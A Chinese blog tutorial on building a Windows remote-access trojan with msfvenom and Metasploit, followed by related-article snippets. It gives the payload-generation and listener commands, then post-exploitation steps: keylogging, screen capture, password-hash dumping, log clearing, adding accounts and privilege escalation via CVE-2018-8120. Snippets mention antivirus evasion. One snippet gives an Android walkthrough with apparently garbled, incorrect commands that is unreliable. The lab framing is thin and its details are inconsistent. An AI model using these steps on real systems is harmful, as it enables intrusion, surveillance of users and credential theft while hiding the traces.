MSF生成一个木马与使用

最新推荐文章于 2025-05-27 23:37:48 发布
原创 最新推荐文章于 2025-05-27 23:37:48 发布 · 1.6w 阅读 · 95 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#MSF的使用 #木马

原理:

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。

准备:

目标:win7 x64专业版
攻击主机:Kali IP:192.168.1.143

生成:

生成test.exe木马文件
Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe
在这里插入图片描述

使用:

Step1:输入msfconsole进入metasploit
在这里插入图片描述

Step2:进入监听模块
Use exploit/multi/handler
在这里插入图片描述

Step3:设置payload反弹
Set payload windows/meterpreter/reverse_tcp
在这里插入图片描述

Step4:设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)
在这里插入图片描述

Step5:exploit攻击开始
在这里插入图片描述

Step6:把生成的木马文件hacker.exe拷贝到靶机WinXP系统中
在测试机中运行该exe文件,回到kali
在这里插入图片描述
出现该界面,表示渗透成功,可以对测试机进行一波操作了。

meterpreter下的命令:
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd

cmd下(测试机是windows):

dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码

演示一下上传漏洞实现本地提权
CVE-2018-8120.exe (漏洞目录在kali的/root/CVE-2018-8120.exe)
在这里插入图片描述

出现了乱码现象,这是编码的问题,在编辑->首选项->兼容性->修改编码—>改成中文的GB2312退出再次shell
在这里插入图片描述
CVE-2018-8120.exe ‘whoami’ 运行,有些机子可以,有些不可以。

【网络安全】 MSF生成木马教程
一直被模仿,从未被超越
03-13 2246
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
利用msfvenom制作windows木马及免杀马
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
Metasploit(msf)系列-木马生成
热门推荐
chaojixiaojingang
09-28 3万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:     -p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者s...
MSF 美少妇安卓木马实战指南
最新发布
tsz520eee的博客
05-27 672
安全不是儿戏,Metasploit 让我们明白攻击和防御之间的微妙平衡。通过合法授权的渗透测试,我们可以更好地保护自己和他人的数字资产。这也是为什么你绝不能随便安装那些来路不明的 `.apk` 文件。很可能就是被改了壳的木马,一不小心就送了后门,自己设备立刻沦陷。网络安全,人人有责,别做那种“随便点就中招”的弱鸡,保持警觉,才是真正的王道。🔥。
msf生成木马
liu_jia_liang的博客
03-29 1万+
Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
MSF生成windows木马
lenkee的博客
10-22 2万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 2067
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 3232
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
kali 中使用msf生成远控木马入侵windows(简单易懂,小白轻松上手)
保持进步,保持少年感
01-31 1431
kali 中使用msf生成远控木马入侵windows
【网络安全】 MSF生成木马教程(1)
2401_84263282的博客
04-28 590
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。最后就是项目实战,这里带来的是。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 5053
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msfvenom生成木马-windows
aheyor的博客
10-22 714
通常使用 Kali Linux(例如 Kali 2021.3)作为攻击系统,目标靶机为 Windows 10 专业版。请注意,这些步骤仅适用于合法的安全测试和学习目的。未经授权使用这些技术侵犯他人计算机系统是非法的。是 Metasploit 框架中的一个独立有效载荷生成器,它是。的替代品,用于生成后门程序。
msf上制作简单的windows exe木马
weixin_73942557的博客
10-25 1354
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 1万+
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
Metasploit -- 生成木马(msfvenom)
Web安全工具库
03-03 1297
男孩子都是铁的,你不用考虑他们的感受,他们真的不累,真的,真的不累。。。 ---- 网易云热评 作用:生成木马文件 1、msfvenom 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all -n, --nopsled <length> 为payload预先指定一个N.
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 4187
msfconsole制作windows木马并上线获取控制权限
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 6087
msfvenom生成木马教程
msf生成免杀木马
qq_56426046的博客
09-08 6158
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
kail里面使用msf工具生成一个Android木马程序
09-20
Kali Linux是一个著名的开源渗透测试平台,其中包含Metasploit Framework (MSF) 这个强大的攻击工具集。如果你想在Kali里利用Metasploit生成针对Android的恶意软件(木马),你需要按照以下步骤操作: 1. **安装 Metasploit**:首先,在终端中更新系统并安装Metasploit框架: ``` sudo apt-get update sudo apt-get install -y metasploit-framework ``` 2. **加载 Android payload**:在Metasploit的交互模式(`meterpreter>`提示符下),输入`use exploit/multi/handler`选择通用处理器的处理程序。然后输入`set platform android`设置目标平台为Android。 3. **选择payload**:查看可用的Android payload,如 `search 'android'`。例如,如果你想要发送短信诱导用户点击,可以使用`exploit/multi/handler -p android/meterpreter/reverse_sms`。记得替换`RHOSTS`、`LPORT`等变量为你实际的目标主机和端口。 4. **配置Payload**:设置接收连接的IP地址和端口,以及必要的权限提升选项等。 5. **生成木马**:最后,运行命令`run`执行生成过程,Metasploit会生成一个Android木马文件,通常以`.apk`文件形式提供。 ```plaintext meterpreter > use exploit/multi/handler meterpreter > set platform android meterpreter > search 'android' [*] Modules matching the query 'android': [+] exploit/multi/handler - Multi-handler for exploitation payloads [+] exploit/multi/handler/android/meterpreter/reverse_https - HTTPS reverse TCP handler for Android [+] exploit/multi/handler/android/meterpreter/reverse_http - HTTP reverse TCP handler for Android ... meterpreter > set payload android/meterpreter/reverse_sms meterpreter > set lhost <your_ip_address> meterpreter > set lport <your_port> meterpreter > run [*] Generating stage... [*] Sending staging package... [*] Meterpreter session 1 opened (<your_ip_address>:<your_port>) at <target_device>:<received_port> by 192.168.1.10 as uid 0 ```
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值